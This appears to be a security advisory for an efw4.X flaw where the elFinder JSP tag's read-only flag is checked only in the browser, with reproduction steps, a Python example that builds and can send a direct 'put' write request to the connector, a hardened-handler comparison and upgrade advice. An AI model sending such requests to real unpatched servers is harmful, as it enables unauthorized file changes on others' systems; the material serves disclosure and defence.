efw4.X Server-Side Read-Only Flag Vulnerability in elFinder JSP Tag Allowing Unauthorized File Modifications

Vulnerability

A vulnerability exists in efw4.X versions prior to 4.08.010: the read-only flag on the <efw:elFinder> JSP tag is enforced only on the client side. The flag is intended to prevent file modifications, but an attacker who sends requests directly to the elFinder connector endpoint can perform file operations regardless of it. The flag only hides UI controls and is echoed back in response metadata; the server never checks it before executing write commands. As a result, every file operation remains available even when the elFinder instance is configured as read-only and protected.

Impact

This vulnerability renders the read-only control ineffective, because the restriction exists only in the client. Anyone who can reach the connector endpoint can bypass it with a direct HTTP request. Beyond unauthorized file modification, write access to the served directory could be chained with other weaknesses to reach remote code execution, while developers who rely on the flag are left with a false sense of security.

Reproduction

To reproduce this vulnerability, configure the elFinder instance with 'protected=true' and 'readonly=true'. Then send a POST request to the '/helloworld/efwServlet' endpoint with the 'cmd' parameter set to 'put', together with the 'id', 'target', 'content', 'encoding', 'isAbs', 'home', and 'readonly' parameters. Note that 'readonly' here is a request parameter supplied by the client, not the server-side tag setting. The response reports that the write operation succeeded, even though the read-only flag is active on the tag.
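The following is an added example, not code from efw or elFinder, covering both the mechanism described under Vulnerability and the request described under Reproduction. It builds the direct 'put' request with the parameter names the advisory lists (all values are placeholders), and then models the connector twice over a constructed in-memory volume: a flawed handler that only echoes the read-only setting in response metadata, and a hardened one that refuses write commands based on the server-side tag configuration before dispatch, ignoring the client-supplied 'readonly' field. The set of write commands and the error codes are assumptions of the model.

```python
"""
Illustrative model of the efw4.X elFinder read-only bypass.

Added example, not code from efw or elFinder. Parameter names come from the
advisory; their values, the volume layout, the command list and the error
codes are assumptions made for this model.
"""
from urllib.parse import urlencode
from urllib.request import Request, urlopen

# elFinder connector commands that modify the volume (assumed list for the
# model; derive the real one from the connector's own command table).
WRITE_COMMANDS = {"put", "rm", "mkdir", "mkfile", "rename", "paste",
                  "upload", "duplicate", "archive", "extract"}


def build_put_form(target, content, home="/", readonly="true",
                   encoding="UTF-8", is_abs="false", elfinder_id="elfinder"):
    """Form fields for the reproduction request. Values are placeholders."""
    return {
        "cmd": "put",
        "id": elfinder_id,
        "target": target,
        "content": content,
        "encoding": encoding,
        "isAbs": is_abs,
        "home": home,
        # Supplied by the client, so a server that honours it is not protected.
        "readonly": readonly,
    }


def send_put(base_url, form, timeout=10):
    """POST the form to the advisory's endpoint and return the response body.
    Not called at import time; base_url is an assumption (e.g. a lab host)."""
    req = Request(base_url.rstrip("/") + "/helloworld/efwServlet",
                  data=urlencode(form).encode(), method="POST")
    with urlopen(req, timeout=timeout) as resp:
        return resp.read().decode()


def vulnerable_connector(server_readonly, form, files):
    """Model of the pre-4.08.010 behaviour: the tag's read-only setting is
    only reported back in the response, never consulted before the write.
    Only 'put' is modelled; other commands return an unknown-command error."""
    if form["cmd"] == "put":
        files[form["target"]] = form["content"]
        return {"changed": [form["target"]], "readonly": server_readonly}
    return {"error": "errUnknownCmd"}


def hardened_connector(server_readonly, form, files):
    """Server-side enforcement: decide from the tag configuration, before
    dispatch, and ignore the client-supplied 'readonly' field entirely."""
    cmd = form["cmd"]
    if server_readonly and cmd in WRITE_COMMANDS:
        return {"error": "errAccess"}
    if cmd == "put":
        files[form["target"]] = form["content"]
        return {"changed": [form["target"]], "readonly": server_readonly}
    return {"error": "errUnknownCmd"}


if __name__ == "__main__":
    # Constructed in-memory volume standing in for the served directory.
    volume = {"l1_notes.txt": "original"}
    form = build_put_form("l1_notes.txt", "attacker content")
    print(vulnerable_connector(True, form, dict(volume)))  # write succeeds
    print(hardened_connector(True, form, dict(volume)))    # errAccess
```

The point of the hardened handler is where the decision is made: the only input to the read-only check is the server-side tag configuration, and the check runs before any command is dispatched, so the value of the 'readonly' form field (or its absence) cannot change the outcome. Against a live pre-4.08.010 instance, send_put would return a success response for the same form.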

Remediation

Users should update to efw4.X version 4.08.010 or later, where this vulnerability has been fixed.

Added: May 12, 2026, 10:27 PM
Updated: May 12, 2026, 10:27 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 0.6
exploitability: 6.6
remediation: 0.0
relevance: 8.1
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.